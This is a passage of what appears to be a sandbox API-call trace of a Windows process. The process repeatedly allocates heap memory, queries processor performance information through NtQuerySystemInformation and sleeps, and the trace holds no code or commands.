RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.484] Sleep (dwMilliseconds=0x110) [0279.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0279.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.497] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0279.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0279.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0279.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0279.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0279.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0279.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0279.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.502] Sleep (dwMilliseconds=0x110) [0279.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0279.523] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0279.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0279.523] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0279.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0279.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0279.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0279.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0279.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.529] Sleep (dwMilliseconds=0x110) [0279.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0279.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0279.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0279.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0279.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0279.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0279.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0279.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0279.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.547] Sleep (dwMilliseconds=0x110) [0279.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0279.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0279.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0279.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0279.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0279.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0279.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0279.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0279.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.562] Sleep (dwMilliseconds=0x110) [0279.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0279.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0279.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0279.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0279.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0279.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0279.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0279.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0279.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.580] Sleep (dwMilliseconds=0x110) [0279.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0279.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0279.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0279.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0279.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0279.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0279.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0279.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0279.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.595] Sleep (dwMilliseconds=0x110) [0279.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0279.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0279.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0279.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0279.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0279.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0279.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0279.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0279.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.609] Sleep (dwMilliseconds=0x110) [0279.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0279.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0279.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0279.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0279.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0279.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0279.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0279.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0279.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.628] Sleep (dwMilliseconds=0x110) [0279.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0279.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0279.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0279.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0279.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0279.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0279.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0279.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0279.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.641] Sleep (dwMilliseconds=0x110) [0279.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0279.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0279.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0279.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0279.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0279.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0279.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0279.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0279.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.657] Sleep (dwMilliseconds=0x110) [0279.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0279.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0279.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0279.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0279.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0279.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0279.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0279.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0279.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.672] Sleep (dwMilliseconds=0x110) [0279.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0279.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0279.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0279.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0279.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0279.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0279.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0279.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0279.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.688] Sleep (dwMilliseconds=0x110) [0279.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0279.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.700] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0279.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0279.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0279.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0279.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0279.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0279.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0279.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.702] Sleep (dwMilliseconds=0x110) [0279.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0279.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0279.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0279.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0279.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0279.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0279.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0279.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.717] 